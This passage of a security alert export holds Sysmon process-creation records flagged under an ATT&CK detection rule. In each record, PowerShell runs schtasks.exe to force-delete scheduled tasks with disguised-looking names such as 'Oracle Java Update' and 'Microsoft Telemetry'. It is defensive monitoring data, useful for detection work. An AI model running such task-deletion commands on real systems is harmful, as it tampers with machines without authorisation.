/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.484230300Z"",""eventRecordID"":""2215"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.481\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001007c51900}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.481"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001007c51900}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.978",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.458 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001077c31900} +ProcessId: 6152 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 
6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.460459900Z"",""eventRecordID"":""2214"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.458\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001077c31900}\r\nProcessId: 6152\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.458"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001077c31900}"",""processId"":""6152"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.962",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.432 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c8c11900} +ProcessId: 7080 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams 
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.439746900Z"",""eventRecordID"":""2213"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.432\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c8c11900}\r\nProcessId: 7080\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.432"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010c8c11900}"",""processId"":""7080"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.946",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.401 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-00100fc01900} +ProcessId: 6832 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.404525700Z"",""eventRecordID"":""2212"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.401\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-00100fc01900}\r\nProcessId: 6832\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.401"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-00100fc01900}"",""processId"":""6832"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.931",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.360 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001063be1900} +ProcessId: 2596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.365128200Z"",""eventRecordID"":""2211"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.360\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001063be1900}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.360"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001063be1900}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.915",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.319 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d2bc1900} +ProcessId: 6372 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.321898200Z"",""eventRecordID"":""2210"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.319\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d2bc1900}\r\nProcessId: 6372\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.319"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010d2bc1900}"",""processId"":""6372"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.900",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.287 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001005bb1900} +ProcessId: 1548 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" 